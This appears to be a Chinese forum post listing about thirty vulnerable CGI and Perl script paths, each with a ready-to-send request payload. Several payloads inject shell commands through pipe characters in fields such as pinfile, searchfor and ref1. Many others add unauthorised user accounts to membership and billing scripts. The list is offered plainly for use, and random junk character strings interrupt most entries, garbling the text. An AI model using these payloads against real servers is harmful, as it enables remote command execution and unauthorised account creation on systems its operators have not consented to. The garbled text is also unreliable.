Cgi-bin 30个漏洞＋使用方法

admin

==============================

/smspass.pl
4 J1 p7 v2 r) W/ w3 p8 |: Nusername=username&password=password
- g- E8 s& P1 B- B9 g. f1 |
/index.cgi
wei=ren&gen=command

6 E2 u' {: P% i& Q% y$ S$ y/passmaster.cgi
Action=Add&Username=Username&Password=Password
6 V" u  m$ }, y  W
. x( d$ b8 t2 O+ f4 T5 _5 H# W  ~/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
1 _; j- v1 \2 ^3 I& |0 h: r; P/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
8 ?1 M( s9 X/ W. S
/ccbill-local.asp
" J! n" a' |( r9 w+ ppost_values=username:password

/count.cgi
$ V( \* d/ D0 C$ A* B3 Qpinfile=|echo;ls -la;exit|

) J9 K% R: K: m. @' j/recon.cgi
/recon.cgi?search
, w) t! @2 F& h8 d: V. B: X' t9 G, `& P- jsearchoption=1&searchfor=|echo;ls -al;exit|
. D  P  v& z% n- y8 B; [$ ]  ]5 R
% S( o& n9 U3 J1 s* X) `% N/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|
. g* b3 W3 O4 Y7 Z
/modify.cgi
. I0 y% P* Z6 O/ |username=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

/ L7 S: l8 u3 O/gx9passwd.cgi
( V5 c' l- v1 L3 w  qcmd=ADD&user=username&pass=password
# A0 y; W# a+ i$ W1 N0 _! R
4 ?! U" I( f( F, |, v& x  a! G/probecontrol.cgi
command=enable&username=username&password=password

/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
! m" V9 i  U  k8 ~. b' m0 v: m; g
6 j4 F+ s9 I% S: s2 \7 v/htadd.pl
configfile=|echo; ls -alt; exit

/gx9passwd.cgi
- O& P. l$ X1 F" l2 E8 |( W$ [cmd=ADD&user=username&pass=password

/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
, y  f$ Q; W, J
/cpay.cgi
# {$ ~) |+ m6 ?/ \% [" J7 _command=add_member&username=username(EMAIL)&password=password(DES)

) S* W4 m3 ^4 M/globill_ut.cgi
6 c9 k6 W! R- M$ A+ F3 q- S  c, m% sdo=add&username=username&password=password&wpassword=password
* n6 ?, N1 }0 E* V. W
/usercontrol.cgi
command=enable&username=USER&password=PASS

, f9 O* G; _; Z/globoSALErum.cgi
( o( w! L3 M3 caction=ADD&seccode=seccode&login=username&password=password
  Q' ~5 v& J1 b0 f5 _8 q. n
/addusr.pl
user=USER&pass=PASS&confirm=PASS
9 _5 M; ]: g: g4 _  Y
# U, n. w3 n( A; h+ q$ V/ A/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
+ X( p8 K# u6 i
/accountcreate.cgi
$ `9 ~: ?4 u- F" W- n/cgi-bin/gateway/accountcreate.cgi
( v& n3 h& j( C' H+ q: }username=username&password=password&password2=password&ref1=|echo;ls -al;exit
# Y3 t- W4 t8 g) n. ]3 g6 Z
/af.cgi
/env.cgi
7 K0 f: l. g7 k) u1 w$ y5 n0 yADD+;echo;pwd;exit

/count.cgi
9 [. n) F( l3 z' t: {pinfile=|echo;pwd;exit|

/recon.cgi
4 E, x1 P% G1 C; D7 d+ esearchoption=1&searchfor=|echo;ls%20-al;exit|
( L) X1 i: ?; ^: v! g
8 q! E+ k8 n- i, I, u* |/add.cgi
9 F' N* K' m" C( _4 pusername=username&password=password&expire=30
+ }+ |2 f, W9 i4 O7 C
==============================
) m5 ?+ E) B6 k1 i